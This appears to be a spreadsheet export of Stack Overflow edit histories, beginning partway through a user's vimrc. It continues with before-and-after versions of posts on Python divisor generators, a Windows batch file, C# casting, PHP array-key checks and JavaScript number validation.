            \     if (foldlevel(JumpCursorOnEdit_foo) &amp;gt; foldlevel(JumpCursorOnEdit_foo - 1)) |_x000D_
            \        let JumpCursorOnEdit_foo = JumpCursorOnEdit_foo - 1 |_x000D_
            \        let b:doopenfold = 2 |_x000D_
            \     endif |_x000D_
            \     exe JumpCursorOnEdit_foo |_x000D_
            \   endif |_x000D_
            \ endif_x000D_
   " Need to postpone using "zv" until after reading the modelines._x000D_
   autocmd BufWinEnter *_x000D_
            \ if exists("b:doopenfold") |_x000D_
            \   exe "normal zv" |_x000D_
            \   if(b:doopenfold &amp;gt; 1) |_x000D_
            \       exe  "+".1 |_x000D_
            \   endif |_x000D_
            \   unlet b:doopenfold |_x000D_
            \ endif_x000D_
augroup END_x000D_
_x000D_
"}}}_x000D_
_x000D_
"{{{Misc Settings_x000D_
_x000D_
" Necesary  for lots of cool vim things_x000D_
set nocompatible_x000D_
_x000D_
" This shows what you are typing as a command.  I love this!_x000D_
set showcmd_x000D_
_x000D_
" Folding Stuffs_x000D_
set foldmethod=marker_x000D_
_x000D_
" Needed for Syntax Highlighting and stuff_x000D_
filetype on_x000D_
filetype plugin on_x000D_
syntax enable_x000D_
set grepprg=grep\ -nH\ $*_x000D_
_x000D_
" Who doesn't like autoindent?_x000D_
set autoindent_x000D_
_x000D_
" Spaces are better than a tab character_x000D_
set expandtab_x000D_
set smarttab_x000D_
_x000D_
" Who wants an 8 character tab?  Not me!_x000D_
set shiftwidth=3_x000D_
set softtabstop=3_x000D_
_x000D_
" Use english for spellchecking, but don't spellcheck by default_x000D_
if version &amp;gt;= 700_x000D_
   set spl=en spell_x000D_
   set nospell_x000D_
endif_x000D_
_x000D_
" Real men use gcc_x000D_
"compiler gcc_x000D_
_x000D_
" Cool tab completion stuff_x000D_
set wildmenu_x000D_
set wildmode=list:longest,full_x000D_
_x000D_
" Enable mouse support in console_x000D_
set mouse=a_x000D_
_x000D_
" Got backspace?_x000D_
set backspace=2_x000D_
_x000D_
" Line Numbers PWN!_x000D_
set number_x000D_
_x000D_
" Ignoring case is a fun trick_x000D_
set ignorecase_x000D_
_x000D_
" And so is Artificial Intellegence!_x000D_
set smartcase_x000D_
_x000D_
" This is totally awesome - remap jj to escape in insert mode.  You'll never type jj anyway, so it's great!_x000D_
inoremap jj &amp;lt;Esc&amp;gt;_x000D_
_x000D_
nnoremap JJJJ &amp;lt;Nop&amp;gt;_x000D_
_x000D_
" Incremental searching is sexy_x000D_
set incsearch_x000D_
_x000D_
" Highlight things that we find with the search_x000D_
set hlsearch_x000D_
_x000D_
" Since I use linux, I want this_x000D_
let g:clipbrdDefaultReg = '+'_x000D_
_x000D_
" When I close a tab, remove the buffer_x000D_
set nohidden_x000D_
_x000D_
" Set off the other paren_x000D_
highlight MatchParen ctermbg=4_x000D_
" }}}_x000D_
_x000D_
"{{{Look and Feel_x000D_
_x000D_
" Favorite Color Scheme_x000D_
if has("gui_running")_x000D_
   colorscheme inkpot_x000D_
   " Remove Toolbar_x000D_
   set guioptions-=T_x000D_
   "Terminus is AWESOME_x000D_
   set guifont=Terminus\ 9_x000D_
else_x000D_
   colorscheme metacosm_x000D_
endif_x000D_
_x000D_
"Status line gnarliness_x000D_
set laststatus=2_x000D_
set statusline=%F%m%r%h%w\ (%{&amp;amp;ff}){%Y}\ [%l,%v][%p%%]_x000D_
_x000D_
" }}}_x000D_
_x000D_
"{{{ Functions_x000D_
_x000D_
"{{{ Open URL in browser_x000D_
_x000D_
function! Browser ()_x000D_
   let line = getline (".")_x000D_
   let line = matchstr (line, "http[^   ]*")_x000D_
   exec "!konqueror ".line_x000D_
endfunction_x000D_
_x000D_
"}}}_x000D_
_x000D_
"{{{Theme Rotating_x000D_
let themeindex=0_x000D_
function! RotateColorTheme()_x000D_
   let y = -1_x000D_
   while y == -1_x000D_
      let colorstring = "inkpot#ron#blue#elflord#evening#koehler#murphy#pablo#desert#torte#"_x000D_
      let x = match( colorstring, "#", g:themeindex )_x000D_
      let y = match( colorstring, "#", x + 1 )_x000D_
      let g:themeindex = x + 1_x000D_
      if y == -1_x000D_
         let g:themeindex = 0_x000D_
      else_x000D_
         let themestring = strpart(colorstring, x + 1, y - x - 1)_x000D_
         return ":colorscheme ".themestring_x000D_
      endif_x000D_
   endwhile_x000D_
endfunction_x000D_
" }}}_x000D_
_x000D_
"{{{ Paste Toggle_x000D_
let paste_mode = 0 " 0 = normal, 1 = paste_x000D_
_x000D_
func! Paste_on_off()_x000D_
   if g:paste_mode == 0_x000D_
      set paste_x000D_
      let g:paste_mode = 1_x000D_
   else_x000D_
      set nopaste_x000D_
      let g:paste_mode = 0_x000D_
   endif_x000D_
   return_x000D_
endfunc_x000D_
"}}}_x000D_
_x000D_
"{{{ Todo List Mode_x000D_
_x000D_
function! TodoListMode()_x000D_
   e ~/.todo.otl_x000D_
   Calendar_x000D_
   wincmd l_x000D_
   set foldlevel=1_x000D_
   tabnew ~/.notes.txt_x000D_
   tabfirst_x000D_
   " or 'norm! zMzr'_x000D_
endfunction_x000D_
_x000D_
"}}}_x000D_
_x000D_
"}}}_x000D_
_x000D_
"{{{ Mappings_x000D_
_x000D_
" Open Url on this line with the browser \w_x000D_
map &amp;lt;Leader&amp;gt;w :call Browser ()&amp;lt;CR&amp;gt;_x000D_
_x000D_
" Open the Project Plugin &amp;lt;F2&amp;gt;_x000D_
nnoremap &amp;lt;silent&amp;gt; &amp;lt;F2&amp;gt; :Project&amp;lt;CR&amp;gt;_x000D_
_x000D_
" Open the Project Plugin_x000D_
nnoremap &amp;lt;silent&amp;gt; &amp;lt;Leader&amp;gt;pal  :Project .vimproject&amp;lt;CR&amp;gt;_x000D_
_x000D_
" TODO Mode_x000D_
nnoremap &amp;lt;silent&amp;gt; &amp;lt;Leader&amp;gt;todo :execute TodoListMode()&amp;lt;CR&amp;gt;_x000D_
_x000D_
" Open the TagList Plugin &amp;lt;F3&amp;gt;_x000D_
nnoremap &amp;lt;silent&amp;gt; &amp;lt;F3&amp;gt; :Tlist&amp;lt;CR&amp;gt;_x000D_
_x000D_
" Next Tab_x000D_
nnoremap &amp;lt;silent&amp;gt; &amp;lt;C-Right&amp;gt; :tabnext&amp;lt;CR&amp;gt;_x000D_
_x000D_
" Previous Tab_x000D_
nnoremap &amp;lt;silent&amp;gt; &amp;lt;C-Left&amp;gt; :tabprevious&amp;lt;CR&amp;gt;_x000D_
_x000D_
" New Tab_x000D_
nnoremap &amp;lt;silent&amp;gt; &amp;lt;C-t&amp;gt; :tabnew&amp;lt;CR&amp;gt;_x000D_
_x000D_
" Rotate Color Scheme &amp;lt;F8&amp;gt;_x000D_
nnoremap &amp;lt;silent&amp;gt; &amp;lt;F8&amp;gt; :execute RotateColorTheme()&amp;lt;CR&amp;gt;_x000D_
_x000D_
" DOS is for fools._x000D_
nnoremap &amp;lt;silent&amp;gt; &amp;lt;F9&amp;gt; :%s/$//g&amp;lt;CR&amp;gt;:%s// /g&amp;lt;CR&amp;gt;_x000D_
_x000D_
" Paste Mode!  Dang! &amp;lt;F10&amp;gt;_x000D_
nnoremap &amp;lt;silent&amp;gt; &amp;lt;F10&amp;gt; :call Paste_on_off()&amp;lt;CR&amp;gt;_x000D_
set pastetoggle=&amp;lt;F10&amp;gt;_x000D_
_x000D_
" Edit vimrc \ev_x000D_
nnoremap &amp;lt;silent&amp;gt; &amp;lt;Leader&amp;gt;ev :tabnew&amp;lt;CR&amp;gt;:e ~/.vimrc&amp;lt;CR&amp;gt;_x000D_
_x000D_
" Edit gvimrc \gv_x000D_
nnoremap &amp;lt;silent&amp;gt; &amp;lt;Leader&amp;gt;gv :tabnew&amp;lt;CR&amp;gt;:e ~/.gvimrc&amp;lt;CR&amp;gt;_x000D_
_x000D_
" Up and down are more logical with g.._x000D_
nnoremap &amp;lt;silent&amp;gt; k gk_x000D_
nnoremap &amp;lt;silent&amp;gt; j gj_x000D_
inoremap &amp;lt;silent&amp;gt; &amp;lt;Up&amp;gt; &amp;lt;Esc&amp;gt;gka_x000D_
inoremap &amp;lt;silent&amp;gt; &amp;lt;Down&amp;gt; &amp;lt;Esc&amp;gt;gja_x000D_
_x000D_
" Good call Benjie (r for i)_x000D_
nnoremap &amp;lt;silent&amp;gt; &amp;lt;Home&amp;gt; i &amp;lt;Esc&amp;gt;r_x000D_
nnoremap &amp;lt;silent&amp;gt; &amp;lt;End&amp;gt; a &amp;lt;Esc&amp;gt;r_x000D_
_x000D_
" Create Blank Newlines and stay in Normal mode_x000D_
nnoremap &amp;lt;silent&amp;gt; zj o&amp;lt;Esc&amp;gt;_x000D_
nnoremap &amp;lt;silent&amp;gt; zk O&amp;lt;Esc&amp;gt;_x000D_
_x000D_
" Space will toggle folds!_x000D_
nnoremap &amp;lt;space&amp;gt; za_x000D_
_x000D_
" Search mappings: These will make it so that going to the next one in a_x000D_
" search will center on the line it's found in._x000D_
map N Nzz_x000D_
map n nzz_x000D_
_x000D_
" Testing_x000D_
set completeopt=longest,menuone,preview_x000D_
_x000D_
inoremap &amp;lt;expr&amp;gt; &amp;lt;cr&amp;gt; pumvisible() ? "\&amp;lt;c-y&amp;gt;" : "\&amp;lt;c-g&amp;gt;u\&amp;lt;cr&amp;gt;"_x000D_
inoremap &amp;lt;expr&amp;gt; &amp;lt;c-n&amp;gt; pumvisible() ? "\&amp;lt;lt&amp;gt;c-n&amp;gt;" : "\&amp;lt;lt&amp;gt;c-n&amp;gt;\&amp;lt;lt&amp;gt;c-r&amp;gt;=pumvisible() ? \"\\&amp;lt;lt&amp;gt;down&amp;gt;\" : \"\"\&amp;lt;lt&amp;gt;cr&amp;gt;"_x000D_
inoremap &amp;lt;expr&amp;gt; &amp;lt;m-;&amp;gt; pumvisible() ? "\&amp;lt;lt&amp;gt;c-n&amp;gt;" : "\&amp;lt;lt&amp;gt;c-x&amp;gt;\&amp;lt;lt&amp;gt;c-o&amp;gt;\&amp;lt;lt&amp;gt;c-n&amp;gt;\&amp;lt;lt&amp;gt;c-p&amp;gt;\&amp;lt;lt&amp;gt;c-r&amp;gt;=pumvisible() ? \"\\&amp;lt;lt&amp;gt;down&amp;gt;\" : \"\"\&amp;lt;lt&amp;gt;cr&amp;gt;"_x000D_
_x000D_
" Swap ; and :  Convenient._x000D_
nnoremap ; :_x000D_
nnoremap : ;_x000D_
_x000D_
" Fix email paragraphs_x000D_
nnoremap &amp;lt;leader&amp;gt;par :%s/^&amp;gt;$//&amp;lt;CR&amp;gt;_x000D_
_x000D_
"ly$O#{{{ "lpjjj_%A#}}}jjzajj_x000D_
_x000D_
"}}}_x000D_
_x000D_
"{{{Taglist configuration_x000D_
let Tlist_Use_Right_Window = 1_x000D_
let Tlist_Enable_Fold_Column = 0_x000D_
let Tlist_Exit_OnlyWindow = 1_x000D_
let Tlist_Use_SingleClick = 1_x000D_
let Tlist_Inc_Winwidth = 0_x000D_
"}}}_x000D_
_x000D_
let g:rct_completion_use_fri = 1_x000D_
"let g:Tex_DefaultTargetFormat = "pdf"_x000D_
let g:Tex_ViewRule_pdf = "kpdf"_x000D_
_x000D_
filetype plugin indent on_x000D_
syntax on_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>sth</t>
  </si>
  <si>
    <t>richq</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; To expand on what Shimi has said, you should only be running your loop from 1 to the square root of n. Then to find the pair, do &lt;code&gt;n / i&lt;/code&gt;, and this will cover the whole problem space.&lt;/p&gt; _x000D_
 &lt;p&gt; As was also noted, this is a NP, or 'difficult' problem. Exhaustive search, the way you are doing it, is about as good as it gets for guaranteed answers. This fact is used by encryption algorithms and the like to help secure them. If someone were to solve this problem, most if not all of our current 'secure' communication would be rendered insecure.&lt;/p&gt; _x000D_
 &lt;p&gt; Python code:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;import math_x000D_
_x000D_
&lt;/span&gt;def divisorGenerator(n):_x000D_
    large_divisors = []_x000D_
    for i in xrange(1, int(math.sqrt(n) + 1)):_x000D_
        if n % i is 0:_x000D_
            yield i_x000D_
            if i is not n / i:_x000D_
                large_divisors.insert(0, n / i)_x000D_
    for divisor in large_divisors:_x000D_
        yield divisor_x000D_
_x000D_
print list(divisorGenerator(100))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Which should output a list like:&lt;/p&gt; _x000D_
 &lt;pre&gt;[1, 2, 4, 5, 10, 20, 25, 50, 100]_x000D_
&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; To expand on what Shimi has said, you should only be running your loop from 1 to the square root of n. Then to find the pair, do &lt;code&gt;n / i&lt;/code&gt;, and this will cover the whole problem space.&lt;/p&gt; _x000D_
 &lt;p&gt; As was also noted, this is a NP, or 'difficult' problem. Exhaustive search, the way you are doing it, is about as good as it gets for guaranteed answers. This fact is used by encryption algorithms and the like to help secure them. If someone were to solve this problem, most if not all of our current 'secure' communication would be rendered insecure.&lt;/p&gt; _x000D_
 &lt;p&gt; Python code:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;def divisorGenerator(n):_x000D_
    large_divisors = []_x000D_
    for i in xrange(1, int(math.sqrt(n) + 1)):_x000D_
        if n % i is 0:_x000D_
            yield i_x000D_
            if i is not n / i:_x000D_
                large_divisors.insert(0, n / i)_x000D_
    for divisor in large_divisors:_x000D_
        yield divisor_x000D_
_x000D_
print list(divisorGenerator(100))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Which should output a list like:&lt;/p&gt; _x000D_
 &lt;pre&gt;[1, 2, 4, 5, 10, 20, 25, 50, 100]_x000D_
&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Bill Woodger</t>
  </si>
  <si>
    <t>kmonsoor</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Given your factorGenerator function, here is a divisorGen that should work:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;def divisorGen(n):_x000D_
    factors = list(factorGenerator(n))_x000D_
    nfactors = len(factors)_x000D_
    f = [0] * nfactors_x000D_
    while True:_x000D_
        yield reduce(lambda x, y: x*y, [factors[x][0]**f[x] for x in range(nfactors)], 1)_x000D_
        i = 0_x000D_
        while True:_x000D_
            f[i] += 1_x000D_
            if f[i] &amp;lt;= factors[i][1]:_x000D_
                break_x000D_
            f[i] = 0_x000D_
            i += 1_x000D_
            if i &amp;gt;= nfactors:_x000D_
                return_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The overall efficiency of this algorithm will depend entirely on the efficiency of the factorGenerator.&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; In essence, this algorithm is doing the following:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;factors = prime1 ^ 0 * prime2 ^ 0 * ... primeN ^ 0;_x000D_
          prime1 ^ 0 * prime2 ^ 0 * ... primeN ^ 1;_x000D_
            ...          ...        ...   ...     ;_x000D_
          prime2 ^ i * prime2 ^ j * ... primeN ^ k;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Where &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;i&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;, &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;j&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;, and &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;k&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; are the multiplicity of the prime factor. Given &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;n = 100&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;# Prime factors are 5, and 2 with a multiplicity of 2 for each_x000D_
_x000D_
5 ^ 0 * 2 ^ 0 = 1_x000D_
5 ^ 0 * 2 ^ 1 = 2_x000D_
5 ^ 0 * 2 ^ 2 = 4_x000D_
5 ^ 1 * 2 ^ 0 = 5_x000D_
..._x000D_
5 ^ 2 * 2 ^ 2 = 100_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Given your factorGenerator function, here is a divisorGen that should work:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;def divisorGen(n):_x000D_
    factors = list(factorGenerator(n))_x000D_
    nfactors = len(factors)_x000D_
    f = [0] * nfactors_x000D_
    while True:_x000D_
        yield reduce(lambda x, y: x*y, [factors[x][0]**f[x] for x in range(nfactors)], 1)_x000D_
        i = 0_x000D_
        while True:_x000D_
            f[i] += 1_x000D_
            if f[i] &amp;lt;= factors[i][1]:_x000D_
                break_x000D_
            f[i] = 0_x000D_
            i += 1_x000D_
            if i &amp;gt;= nfactors:_x000D_
                return_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The overall efficiency of this algorithm will depend entirely on the efficiency of the factorGenerator.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>James Mertz</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;y: &amp;amp;pause_x000D_
cd ptls5.0 &amp;amp;pause_x000D_
sdp describe Integration.dpk &amp;amp;pause_x000D_
z: &amp;amp;pause_x000D_
cd ptls5.0 &amp;amp;pause_x000D_
dir &amp;amp;pause_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I have those commands in the 1.cmd file. First three are executely finely. The result of it is that after &lt;span class="diff-delete"&gt;"sdp describe Integration.dpk &amp;amp;pause"&lt;/span&gt; is executed I'm given "press any key to continue..."&lt;span class="diff-delete"&gt; after&lt;/span&gt; I hit any key&lt;span class="diff-delete"&gt;. The&lt;/span&gt; command prompt quits&lt;span class="diff-delete"&gt;. Instead&lt;/span&gt; of changing drive to &lt;span class="diff-delete"&gt;z:&amp;gt;&lt;/span&gt;. What is wrong with it?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;y: &amp;amp;pause_x000D_
cd ptls5.0 &amp;amp;pause_x000D_
sdp describe Integration.dpk &amp;amp;pause_x000D_
z: &amp;amp;pause_x000D_
cd ptls5.0 &amp;amp;pause_x000D_
dir &amp;amp;pause_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I have those commands in the 1.cmd file. First three are executely finely. The result of it is that after &lt;code&gt;&lt;span class="diff-add"&gt;sdp describe Integration.dpk &amp;amp;pause&lt;/span&gt;&lt;/code&gt; is executed I'm given "press any key to continue..."&lt;span class="diff-add"&gt;. After&lt;/span&gt; I hit any key&lt;span class="diff-add"&gt;, the&lt;/span&gt; command prompt quits&lt;span class="diff-add"&gt; instead&lt;/span&gt; of changing drive to &lt;code&gt;&lt;span class="diff-add"&gt;z:\&amp;gt;&lt;/span&gt;&lt;/code&gt;. What is wrong with it?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;span class="diff-delete"&gt; How can I reinterpret cast a &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;float&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; to a &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;int&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; (or a double to a long)?&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;p&gt;&lt;span class="diff-delete"&gt; float f = 2.0f; int i = (int)f; // causes conversion&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; I only want to copy the bit-pattern from f to i. How can this be done?&lt;/p&gt; _x000D_
 &lt;ol start="2"&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;span class="diff-delete"&gt; The implicit and explicit operators in C# uses one intermediate object because the operator function is '&lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;static&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;'&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;p&gt;&lt;span class="diff-delete"&gt; public static implicit operator MyClass(double s) { return new MyClass(s); } ... ... MyCLass m = 2.2; // this code uses 'm' and one intermediate object.&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; This is fine for reference types, but for value-types which are big (say 20-30 bytes), this will cause unnecessary data copy. Is my understanding correct? And If yes, then why doesn't C# have a non-static conversion operator or user-defined assignment operator so that the conversion/assignment takes place on 'this'? If it does, whats the way to do it?&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt;&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; How can&lt;/span&gt; I&lt;span class="diff-add"&gt; reinterpret cast a float to a int (or a double to a long)?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; float f = 2.0f; int i = (int)f; // causes conversion&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I&lt;/span&gt; only want to copy the bit-pattern from f to i. How can this be done?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; 2. The implicit and explicit operators in C# uses one intermediate object because the operator function is 'static'&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; public static implicit operator MyClass(double s) { return new MyClass(s); } .. .. MyCLass m = 2.2; // this code uses 'm' and one intermediate object.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; This is fine for reference types, but for value-types which are big (say 20-30 bytes), this will cause unnecessary data copy. Is my understanding correct? And If yes, then why doesn't C# have a non-static conversion operator or user-defined assignment operator so that the conversion/assignment takes place on 'this'? If it does, whats the way to do it?&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>jjnguy</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You have asked two questions that are not quite equivalent:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Firstly, how to determine whether an array has only numeric keys&lt;/li&gt; _x000D_
  &lt;li&gt; Secondly, how to determine whether an array has &lt;em&gt;sequential&lt;/em&gt; numeric keys, starting from 0&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Consider which of these behaviours you actually need. (It may be that either will do for your purposes.)&lt;/p&gt; _x000D_
 &lt;p&gt; The first question (simply checking that all keys are numeric) is &lt;a href="https://stackoverflow.com/a/4254008/1709587"&gt;answered well by Captain kurO&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; For the second question (checking whether the array is zero-indexed and sequential), you can use the following function:&lt;/p&gt; _x000D_
 &lt;pre class="lang-php prettyprint-override"&gt;&lt;code&gt;function isAssoc(array $arr)_x000D_
{_x000D_
    if (array() === $arr)&lt;span class="diff-delete"&gt;_x000D_
       &lt;/span&gt; return false;&lt;span class="diff-delete"&gt;_x000D_
    ksort($arr);&lt;/span&gt;_x000D_
    return array_keys($arr) !== range(0, count($arr) - 1);_x000D_
}_x000D_
_x000D_
var_dump(isAssoc(array('a', 'b', 'c'))); // false_x000D_
var_dump(isAssoc(array("0" =&amp;gt; 'a', "1" =&amp;gt; 'b', "2" =&amp;gt; 'c'))); // false_x000D_
var_dump(isAssoc(array("1" =&amp;gt; 'a', "0" =&amp;gt; 'b', "2" =&amp;gt; 'c'))); // &lt;span class="diff-delete"&gt;false&lt;/span&gt;_x000D_
var_dump(isAssoc(array("a" =&amp;gt; 'a', "b" =&amp;gt; 'b', "c" =&amp;gt; 'c'))); // true_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You have asked two questions that are not quite equivalent:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Firstly, how to determine whether an array has only numeric keys&lt;/li&gt; _x000D_
  &lt;li&gt; Secondly, how to determine whether an array has &lt;em&gt;sequential&lt;/em&gt; numeric keys, starting from 0&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Consider which of these behaviours you actually need. (It may be that either will do for your purposes.)&lt;/p&gt; _x000D_
 &lt;p&gt; The first question (simply checking that all keys are numeric) is &lt;a href="https://stackoverflow.com/a/4254008/1709587"&gt;answered well by Captain kurO&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; For the second question (checking whether the array is zero-indexed and sequential), you can use the following function:&lt;/p&gt; _x000D_
 &lt;pre class="lang-php prettyprint-override"&gt;&lt;code&gt;function isAssoc(array $arr)_x000D_
{_x000D_
    if (array() === $arr) return false;_x000D_
    return array_keys($arr) !== range(0, count($arr) - 1);_x000D_
}_x000D_
_x000D_
var_dump(isAssoc(array('a', 'b', 'c'))); // false_x000D_
var_dump(isAssoc(array("0" =&amp;gt; 'a', "1" =&amp;gt; 'b', "2" =&amp;gt; 'c'))); // false_x000D_
var_dump(isAssoc(array("1" =&amp;gt; 'a', "0" =&amp;gt; 'b', "2" =&amp;gt; 'c'))); // &lt;span class="diff-add"&gt;true&lt;/span&gt;_x000D_
var_dump(isAssoc(array("a" =&amp;gt; 'a', "b" =&amp;gt; 'b', "c" =&amp;gt; 'c'))); // true_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>MAChitgarha</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;h2&gt;To check if a variable (including a string) is a number, check if it is not a number:&lt;/h2&gt; _x000D_
 &lt;p&gt; This works regardless of whether the variable contains is a string or number.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;isNaN(num)     // returns true if the variable does NOT contain a valid number_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h3&gt;Examples:&lt;/h3&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;isNaN(123)&lt;span class="diff-delete"&gt;  &lt;/span&gt;     // false_x000D_
isNaN('123')&lt;span class="diff-delete"&gt;  &lt;/span&gt;   // false_x000D_
isNaN&lt;span class="diff-delete"&gt;('1e10000') // false  &lt;/span&gt;(&lt;span class="diff-delete"&gt;number is Infinity)_x000D_
isNaN(&lt;/span&gt;'foo')&lt;span class="diff-delete"&gt;  &lt;/span&gt;   // true_x000D_
isNaN('10px')&lt;span class="diff-delete"&gt;  &lt;/span&gt;  // true_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Of course, you can negate this if you need to. For example, to implement the &lt;code&gt;IsNumeric&lt;/code&gt; example you gave:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;function isNumeric(num){_x000D_
    return !isNaN(num)_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h2&gt;To convert a string containing a number into a number:&lt;/h2&gt; _x000D_
 &lt;p&gt; only works if the string &lt;em&gt;only&lt;/em&gt; contains numeric characters, else it returns &lt;code&gt;NaN&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;+num              // returns the numeric value of the string, or NaN if the _x000D_
                  // string isn't purely numeric characters_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;h3&gt;Examples:&lt;/h3&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;+'12'             // 12_x000D_
+'12.'            // 12_x000D_
